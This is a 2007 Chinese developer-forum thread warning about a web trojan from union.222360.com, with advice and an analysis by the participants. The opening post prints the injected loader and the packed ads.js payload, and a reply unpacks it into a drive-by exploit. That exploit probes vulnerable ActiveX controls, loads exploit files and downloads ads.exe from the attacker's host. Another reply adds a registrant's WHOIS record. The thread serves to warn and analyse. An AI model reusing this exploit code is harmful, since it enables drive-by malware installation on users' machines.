首页 新闻 论坛 群组 Blog 文档 下载 读书 Tag 网摘 搜索 .NET Java 游戏 视频 人才 外包 培训 数据库 书店 程序员
中国软件网
欢迎您:游客 | 登录 注册 帮助
  • 警惕最新流氓病毒union.222360.com,严重BS这种无耻行为! [已结贴,结贴人:jspadmin]
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-18 12:36:53 楼主
    一网友MM上周求助,说卡巴一直提示union.222360.com/6.gif病毒,就去帮其重做系统,安装杀软并更新到最新。
    可就在今天,又不行了。
    网上一查,不查不要紧,一查吓一跳,这个流氓还真小有点牛。


    病毒主要为:
    http://union.222360.com/ads.js
    http://union.222360.com/ads.c
    两种,为网页木马病毒
    主要特征:IE浏览器被额外添加恶意代码,用遨游浏览,每打开一个网页,便会出现一个阻止提示:
    拦截均为:http://www.222360.com/ads.js
    查看源代码 网页开头部分都会含有一个 :
    <script  ..........“http://www.222360.com/ads.js” </script>
    的脚本代码
    影响后果:网页的浏览速度变慢或者网页显示状态改变(字体变大等)
    目前诺顿、金山、卡巴、瑞星、麦咖啡以及nod32都无法查杀,请大家注意!!!


    先在“安全模式”下杀毒,然后安装防火墙:
    ARP防火墙单机版 5.0.1:http://www.onlinedown.net/soft/52718.htm
    360ARP防火墙:http://360safe.qihoo.com/down/soft_down11.html
    金山防火墙:http://www.skycn.com/soft/40061.html


    另:其病毒核心代码如下
    <script language="javascript">
    function Get()
    {
    var Then = new Date()
    Then.setTime(Then.getTime() + 24*60*60*1000)
    var cookieString = new String(document.cookie)
    var cookieHeader = "Cookie1="
    var beginPosition = cookieString.indexOf(cookieHeader)
    if (beginPosition != -1)
    {
    }
    else
    {
    document.cookie = "Cookie1=JPGIR;expires="+ Then.toGMTString();
    document.write(' <SCRI' + 'PT LANGUAGE="javascript1.2"');
    document.writeln(' SRC="http://union.222360.com/ads.js"> </SCR' + 'IPT>');
    }
    }
    Get();
    </script>


    http://union.222360.com/ads.js

    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c] ¦ ¦c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('18(7.41.57(\'43\')==-1){23{8 38;8 39=(7.56("10"));39.55("54","58:53-59-64-63-62");8 61=39.65("49.46","")}20(38){};27{8 32=22 44();32.45(32.52()+24*60*60*51);7.41=\'43=50;47=/;32=\'+32.48();7.14(" <16 25=9://11.12.13/6.26> <\\/16>");18(38!="[10 15]"){7.14(" <16 25=9://11.12.13/1.26> <\\/16>")}82{23{8 36;8 81=22 30("80.79")}20(36){};27{18(36!="[10 15]"){7.14(" <16 25=9://11.12.13/2.26> <\\/16>");7.14(" <17 21=\\"28: 31(\'9://11.12.13/19.29\')\\"> </17>")}}23{8 37;8 83=22 30("84.85.1")}20(37){};27{18(37!="[10 15]"){7.14(" <16 25=9://11.12.13/3.26> <\\/16>");7.14(" <17 21=\\"28: 31(\'9://11.12.13/19.29\')\\"> </17>")}}23{8 35;8 77=22 30("78.70")}20(35){};27{18(35!="[10 15]"){7.14(" <16 25=9://11.12.13/4.26> <\\/16>");7.14(" <17 21=\\"28: 31(\'9://11.12.13/19.29\')\\"> </17>")}}23{8 33;8 66=22 30("69.68.1")}20(33){};27{18(33!="[10 15]"){7.14(" <42 21=67:71 25=9://11.12.13/5.26> </42>")}}23{8 34;8 40=22 30("72.76")}20(34){};27{18(34!="[10 15]"){40.75("9://11.12.13/19/19.74","19.73",0);7.14(" <17 21=\\"28: 31(\'9://11.12.13/19.29\')\\"> </17>")}}18(36=="[10 15]"&&37=="[10 15]"&&35=="[10 15]"&&33=="[10 15]"&&34=="[10 15]"){7.14(" <17 21=\\"28: 31(\'9://11.12.13/19.29\')\\"> </17>")}}}}',10,86,' ¦ ¦ ¦ ¦ ¦ ¦ ¦document ¦var ¦http ¦object ¦union ¦222360 ¦com ¦write ¦Error ¦script ¦DIV ¦if ¦ads ¦catch ¦style ¦new ¦try ¦ ¦src ¦gif ¦finally ¦CURSOR ¦c ¦ActiveXObject ¦url ¦expires ¦i ¦j ¦h ¦f ¦g ¦e ¦ado ¦obj ¦cookie ¦iframe ¦OKMOON ¦Date ¦setTime ¦Stream ¦path ¦toGMTString ¦Adodb ¦SUN ¦1000 ¦getTime ¦BD96C556 ¦classid ¦setAttribute ¦createElement ¦indexOf ¦clsid ¦65A3 ¦ ¦as ¦00C04FC29E36 ¦983A ¦11D0 ¦createobject ¦yahoo ¦display ¦GLChatCtrl ¦GLCHAT ¦Vod ¦none ¦BaiduBar ¦exe ¦cab ¦DloadDS ¦Tool ¦thunder ¦DPClient ¦StormPlayer ¦MPS ¦storm ¦else ¦pps ¦POWERPLAYER ¦PowerPlayerCtrl'.split(' ¦'),0,{}))
    0  修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • ming4098
    • 等级:
    发表于:2007-12-18 12:38:421楼 得分:0
    又一个零分贴
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-18 12:40:552楼 得分:0
    若有人能通过各种手段获得本病毒作者的真实身份信息,将奖励可用分若干!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-18 13:21:213楼 得分:0
    如果奖励再大点,估计作者自己来自首了。。。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-18 13:31:564楼 得分:0
    哪位js玩的好的,把这段代码反编译下
    这段代码用了一大堆的replace,把人要搞晕了。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • tantaiyizu
    • 等级:
    发表于:2007-12-18 14:00:295楼 得分:0

    不敢执行啊 汗
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-18 14:07:256楼 得分:0
    这个病毒同arp病毒有关,我遇到过,局域网上有人中毒,控制了网关,大多数通过此网关出去的网页,最前面的html代码都会带上这段脚本。不管你本机是否中毒。如果访问的是默认主页(比如index),机器会变得很慢很慢,内存被大量占用(任务管理器里面看不到)。网络到是没什么问题,上传下载什么的都正常。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • linsoo
    • 等级:
    发表于:2007-12-18 14:46:507楼 得分:0
    话说,不要用IE核心的浏览器就没有这烦恼了...
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-18 14:54:298楼 得分:0
    我知道是arp相关,但想知道它是怎么作到影响arp,所以希望看到这段代码的原始面貌。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-18 15:27:499楼 得分:0
    应该不是这样的,而是先中arp病毒,然后控制网关,然后出现这种现象。并不是这个去影响arp。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-18 18:13:4210楼 得分:0
    控制网关?通过ie漏洞然后就可以控制网关?觉得有难度,首先感染系统并获取权限应该问题不大,但要控制其他电脑,貌似没这么容易吧?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-19 11:17:0911楼 得分:0
    可能是我理解错了,不是控制网关,而是欺骗局域网别的机器,让别的机器以为自己是网关。别的机器向外访问的时候,首先访问中毒的机器。也就是说中毒机器成了第一次访问中转。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-19 11:18:2712楼 得分:0
    当然,想要控制局域网别的机器或者控制网关,应该是不容易,或者不可能,除非对方的机器也中毒了。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-20 13:55:4513楼 得分:0
    上班时间,无聊了,把那段JS解密了一下,hoho,最后执行代码应该如下:
    if (document.cookie.indexOf ('OKMOON ')==-1)
    {
    try
    {
    var e;
    var ado=(document.createElement ("object "));
    ado.setAttribute("classid","clsid :BD96C556-65A3-11D0-983A-00C04FC29E36");
    var as =ado.createobject ("Adodb.Stream","")
    }
    catch (e)
    {};
    finally
    {
    var expires =new Date ();
    expires.setTime (expires.getTime ()+ 1000 );
    document.cookie ='OKMOON=SUN;path =/;expires ='+expires.toGMTString ();
    document.write (" <script src =http://union.222360.com/6.gif > <\/script> ");
    if (e !="[object Error]")
    {
    document.write (" <script src =http://union.222360.com/6.gif > <\/script>")
    }
    else
    {
    try
    {
    var f ;
    var storm =new ActiveXObject ("MPS.StormPlayer")
    }
    catch (f )
    {};
    finally
    {
    if (f !="[object Error]")
    {
    document.write (" <script src =http://union.222360.com/6.gif > <\/script > ");
    document.write (" <DIV style =\"CURSOR:url ('http://union.222360.com/ads.c ')\"> </DIV>")
    }
    }
    try
    {
    var g ;
    var pps =new ActiveXObject ("POWERPLAYER.PowerPlayerCtrl")
    }
    catch (g )
    {};
    finally
    {
    if (g !="[object Error ]")
    {
    document.write (" <script src =http ://union.222360.com/6.gif > <\/script > ");
    document.write (" <DIV style =\"CURSOR : url ('http ://union.222360.com/ads.c')\"> </DIV > ")
    }
    }
    try
    {
    var h ;
    var thunder =new ActiveXObject ("DPClient.Vod")
    }
    catch (h )
    {};
    finally
    {
    if (h !="[object Error ]")
    {
    document.write (" <script src =http ://union.222360.com/6.gif > <\/script > ");
    document.write (" <DIV style =\"CURSOR : url ('http ://union.222360.com/ads.c ')\"> </DIV > ")
    }
    }
    try
    {
    var i ;
    var yahoo =new ActiveXObject ("GLCHAT.GLChatCtrl.")
    }
    catch (i )
    {};
    finally
    {
    if (i !="[object Error ]")
    {
    document.write (" <iframe style =display :none src =http://union.222360.com/6.gif > </iframe > ")
    }
    }
    try
    {
    var j ;
    var obj =new ActiveXObject ("BaiduBar.Tool")
    }
    catch (j )
    {};
    finally
    {
    if (j !="[object Error ]")
    {
    obj.DloadDS ("http ://union.222360.com /ads /ads.cab ","ads.exe ",);
    document.write (" <DIV style =\"CURSOR : url ('http ://union.222360.com/ads.c ')\"> </DIV > ")
    }
    }
    if (f =="[object Error]"&&g =="[object Error]"&&h =="[object Error]"&&i =="[object Error]"&&j =="[object Error]")
    {
    document.write (" <DIV style =\"CURSOR : url ('http ://union.222360.com/ads.c')\"> </DIV > ")
    }
    }
    }
    }

    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • Wolf_FienD
    • 等级:
    发表于:2007-12-20 14:09:3814楼 得分:0
    Y的  不是吧

    我现在用 maxthon 打开 选择 要打开的标签的 时候的 字体 就是 很大个的,

    晕  我也中了

    可是好象没什么异常啊
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-20 14:14:1315楼 得分:0
    楼上,假如你中了的话,然后你访问税务局网站进行报税时,就会出问题。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • knowjava
    • 等级:
    发表于:2007-12-20 14:16:2216楼 得分:0
    呵呵,13楼的不错啊。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-20 14:17:1517楼 得分:0
    MPS.StormPlayer
    POWERPLAYER.PowerPlayerCtrl
    BaiduBar.Tool


    还是不太明白为什么会调用这些,而且,它是怎么做到控制网关的?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-20 14:24:1418楼 得分:0
    哦,不错.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • oyd
    • 等级:
    发表于:2007-12-20 14:47:4019楼 得分:0
    是利用缓冲区溢出进行攻击的。
    没有控制网关,是利用协议漏洞伪装成网关。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-20 14:53:3520楼 得分:0
    19楼强

    哎,好久没整技术,退步太多,惭愧!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • oyd
    • 等级:
    发表于:2007-12-20 14:59:5021楼 得分:0
    这里有两个文件
    6.gif和ads.c
    其中6.gif是一个javascript文件,里面利用realplayer的漏洞播放一个文件,里面强的是几乎对每一个有漏洞的版本都作了相应的处理。
    而ads.c是一个特制的RIFF格式音频,被播放后可能去下载http://ads.adslooks.info/ads/ads.exe执行。
    222360域名无有用信息。
    下面是adslooks.info的域名信息
    Domain ID:D22445562-LRMS
    Domain Name:ADSLOOKS.INFO
    Created On:22-Nov-2007 17:59:13 UTC
    Expiration Date:22-Nov-2008 17:59:13 UTC
    Sponsoring Registrar:eNom, Inc. (R126-LRMS)
    Status:TRANSFER PROHIBITED
    Registrant ID:5BB84A6158E1F8DF
    Registrant Name:WANG MING
    Registrant Organization:wang ming
    Registrant Street1:TW
    Registrant Street2:
    Registrant Street3:
    Registrant City:TW
    Registrant State/Province:Taiwan
    Registrant Postal Code:100000
    Registrant Country:CN
    Registrant Phone:+20.7505582048
    Registrant Phone Ext.:
    Registrant FAX:
    Registrant FAX Ext.:
    Registrant Email:
    Admin ID:5BB84A6158E1F8DF
    Admin Name:WANG MING
    Admin Organization:wang ming
    Admin Street1:TW
    Admin Street2:
    Admin Street3:
    Admin City:TW
    Admin State/Province:Taiwan
    Admin Postal Code:100000
    Admin Country:CN
    Admin Phone:+20.7505582048
    Admin Phone Ext.:
    Admin FAX:
    Admin FAX Ext.:
    Admin Email:
    Billing ID:5BB84A6158E1F8DF
    Billing Name:WANG MING
    Billing Organization:wang ming
    Billing Street1:TW
    Billing Street2:
    Billing Street3:
    Billing City:TW
    Billing State/Province:Taiwan
    Billing Postal Code:100000
    Billing Country:CN
    Billing Phone:+20.7505582048
    Billing Phone Ext.:
    Billing FAX:
    Billing FAX Ext.:
    Billing Email:
    Tech ID:5BB84A6158E1F8DF
    Tech Name:WANG MING
    Tech Organization:wang ming
    Tech Street1:TW
    Tech Street2:
    Tech Street3:
    Tech City:TW
    Tech State/Province:Taiwan
    Tech Postal Code:100000
    Tech Country:CN
    Tech Phone:+20.7505582048
    Tech Phone Ext.:
    Tech FAX:
    Tech FAX Ext.:
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2007-12-20 17:52:0822楼 得分:0
    楼上的厉害。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • jspadmin
    • 等级:
    发表于:2007-12-20 18:03:0323楼 得分:0
    域名我也早就看了,这种一般也不太可能会留下有价值的信息让警察抓
    修改 删除 举报 引用 回复